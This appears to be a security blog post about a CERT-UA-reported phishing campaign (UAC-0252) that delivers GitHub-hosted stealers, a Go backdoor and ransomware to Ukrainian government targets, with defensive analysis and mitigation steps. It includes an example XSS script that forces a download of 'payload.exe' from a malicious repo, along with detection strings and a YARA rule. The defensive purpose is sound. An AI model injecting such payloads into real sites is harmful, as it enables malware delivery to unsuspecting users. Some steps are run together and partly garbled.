Listen to this Post

Introduction:
In a sophisticated campaign targeting Ukrainian government entities, threat actors are weaponizing trusted platforms to bypass traditional security controls. Since early 2026, CERT-UA has tracked activity by the group UAC-0252, which utilizes phishing emails impersonating central authorities. These emails either deliver malicious executables directly or exploit Cross-Site Scripting (XSS) vulnerabilities on legitimate websites to trigger drive-by downloads. Critically, all payloads—including the SHADOWSNIFF stealer, SALATSTEALER, and the DEAFTICK backdoor—are hosted on GitHub, demonstrating how attackers exploit the reputation of development platforms to evade detection.
Learning Objectives:
- Analyze the infection chain of the UAC-0252 campaign, from phishing to payload execution.
- Understand the mechanics of XSS-induced drive-by downloads and GitHub-hosted malware.
- Learn to extract, analyze, and mitigate threats using provided Indicators of Compromise (IoCs).
- Identify forensic artifacts left by stealers like SHADOWSNIFF and ransomware like “AVANGARD ULTIMATE.”
- Implement defensive strategies against phishing campaigns abusing trusted cloud services.
You Should Know:
- Anatomy of the Attack: Phishing, XSS, and GitHub Delivery
The campaign begins with a targeted phishing email claiming to be from a Ukrainian central executive authority. The email discusses “application updates” for civilian or military systems. It contains either a direct attachment (an EXE file) or a link to a compromised or vulnerable website.
If the user clicks the link, they land on a site vulnerable to Cross-Site Scripting (XSS). The attacker injects malicious JavaScript into the site’s response. This script runs in the user’s browser and triggers a forced download from a GitHub repository. By hosting the malicious EXE on github.com, the attackers ensure the download URL is on a highly trusted domain, often bypassing URL filters and reputation-based security tools.
Step‑by‑step guide to investigating a suspicious link:
- Extract the URL: Isolate the link from the email. Do not click it directly.
- Passive Analysis: Use a tool like `curl` with a User-Agent string to see the server response without executing it.
curl -I -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "http://[suspicious-link].com"
- Check for Redirects: Follow the path to see where it ultimately leads.
curl -L -v "http://[suspicious-link].com" -o /dev/null 2>&1 | grep -i "location|github"
- Simulate the XSS (Educational/Lab Use): If you suspect the site is vulnerable, test in a controlled environment. If the site echoes unsanitized input, an attacker could inject:
</li> </ol> <script> window.location.href = 'https://github.com/[malicious-repo]/raw/main/payload.exe'; </script>
This code forces the browser to fetch the executable from GitHub.
2. Dissecting the Payloads: SHADOWSNIFF, SALATSTEALER, and DEAFTICK
The confirmed malware in this campaign serves various purposes, from credential theft to persistent backdoor access.
– SHADOWSNIFF: A stealer hosted on GitHub, likely designed to exfiltrate browser cookies, saved passwords, and cryptocurrency wallets.
– SALATSTEALER: Offered as Malware-as-a-Service (MaaS), this indicates a lower barrier to entry for affiliates.
– DEAFTICK: A primitive backdoor written in Go. Go binaries are often harder to reverse-engineer and can be cross-compiled for multiple operating systems.Step‑by‑step guide to analyzing a malicious executable in a sandbox:
1. Retrieve the Sample: Download the file in a controlled, isolated environment (a VM with no network access). Use `wget` if you have a hash or direct URL.wget https://github.com/[malicious-repo]/raw/update/payload.exe -O sample.exe
2. Check Hashes: Generate the SHA256 hash to compare against IoCs.
PowerShell Get-FileHash .\sample.exe -Algorithm SHA256
Linux sha256sum sample.exe
3. Static Analysis: Use `strings` to extract readable text and find potential C2 servers or IPs.
strings sample.exe | findstr /i "http https github ip telegram"
4. Monitor Behavior (Dynamic Analysis): Run the file in a sandbox while monitoring network traffic with Wireshark or Process Monitor (ProcMon) to see registry changes and outbound connections.
- The Ransomware Connection: “AVANGARD ULTIMATE v6.0” and CVE-2025-8088
During their investigation, researchers discovered additional malicious software on the same GitHub infrastructure: a ransomware strain internally dubbed “AVANGARD ULTIMATE v6.0” and an archive containing an exploit for WinRAR vulnerability CVE-2025-8088. This suggests the threat actor is either preparing for a more destructive phase or is part of a larger, multi-purpose crime syndicate.
Step‑by‑step guide to mitigating the WinRAR vulnerability (CVE-2025-8088):
This vulnerability likely allows for arbitrary code execution when a user extracts a specially crafted archive.
1. Identify Vulnerable Versions: Check the installed version of WinRAR on Windows systems.Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\" | Where-Object {$_.DisplayName -like "WinRAR"} | Select-Object DisplayName, DisplayVersion2. Harden File Association: While patching is key, consider disabling automatic extraction via web browsers or email clients.
3. Patch Immediately: The primary mitigation is to update WinRAR to the latest version. If an update is unavailable, consider temporarily using 7-Zip as an alternative, as it handles archives differently.- GitHub as a Threat Vector: Hunting Malicious Repositories
Attackers abuse GitHub because it is fast, reliable, and trusted. To hunt for these threats, blue teams must proactively monitor GitHub for malicious commits associated with their organization.
Step‑by‑step guide to hunting for malicious GitHub activity:
- Use GitHub Code Search: Search for filenames or strings associated with the campaign.
"SHADOWSNIFF" extension:exe "UAC-0252" OR "PalachPro"
- Monitor for Typosquatting: Search for repositories with names similar to your internal tools.
Example: Searching for repos with 'update' and your company name curl -H "Accept: application/vnd.github.v3+json" "https://api.github.com/search/repositories?q=[bash]+update+malware"
- Clone Suspicious Repos for Analysis: If you find a repository hosting a file named `update.exe` but claiming to be something else, clone it for offline analysis.
git clone https://github.com/[suspicious-user]/[suspicious-repo].git cd [suspicious-repo] Check the commit history git log -p
5. Indicators of Compromise (IoCs) and Network Defense
The provided link (https://lnkd.in/dHZUf_wd) contains the specific IoCs. Defenders must ingest these into their security tools.
Step‑by‑step guide to operationalizing IoCs:
1. Download and Parse the IoC List.
wget https://lnkd.in/dHZUf_wd -O uac0252_iocs.txt
2. Block Domains/IPs on Firewall (Linux – iptables):
Assuming the IoC list contains IPs for ip in $(cat uac0252_iocs.txt | grep -Eo '([0-9]{1,3}.){3}[0-9]{1,3}'); do iptables -A OUTPUT -d $ip -j DROP done3. Block on Windows Firewall (PowerShell):
$ips = Get-Content .\uac0252_iocs.txt | Select-String -Pattern '\b\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}\b' foreach ($ip in $ips) { New-NetFirewallRule -DisplayName "Block UAC-0252" -Direction Outbound -Action Block -RemoteAddress $ip.Line }4. YARA Rule for SHADOWSNIFF: Create a YARA rule to detect the stealer in memory or on disk.
rule SHADOWSNIFF_Stealer { meta: description = "Detects SHADOWSNIFF stealer used in UAC-0252 campaign" author = "Undercode" strings: $s1 = "SHADOWSNIFF" wide ascii $s2 = "github.com/[malicious-path]" ascii $s3 = "TelegramBotToken" wide condition: any of them }What Undercode Say:
- Trust is a Liability: The abuse of GitHub proves that organizations must inspect traffic to trusted domains just as rigorously as they inspect traffic to unknown sites. SSL inspection and cloud access security brokers (CASBs) are no longer optional.
- The Convergence of Threats: The presence of stealers, a backdoor, and ransomware in the same infrastructure indicates that the line between nation-state espionage (CERT-UA attribution) and cybercrime is blurring. Data stolen by SHADOWSNIFF could be used for later ransomware deployment.
- Proactive Defense is Key: Waiting for alerts on known IoCs is reactive. Defenders must hunt for patterns—such as anomalous PowerShell executions originating from Microsoft Office products or unexpected outbound connections to
raw.githubusercontent.com—to catch these attacks before files are written to disk.
Prediction:
This campaign signals a significant evolution in cyber warfare tactics. We predict that by late 2026, the use of legitimate development platforms (GitHub, GitLab, AWS S3 buckets) as primary payload hosts will become the default for both cybercriminals and state-sponsored actors. Furthermore, the discovery of the WinRAR exploit (CVE-2025-8088) alongside the ransomware suggests that UAC-0252 is preparing for a “big game hunting” phase, where they will attempt to move laterally within government networks and deploy ransomware not just for data theft, but for maximum disruptive impact against critical national infrastructure.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Serhii Demediuk – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:


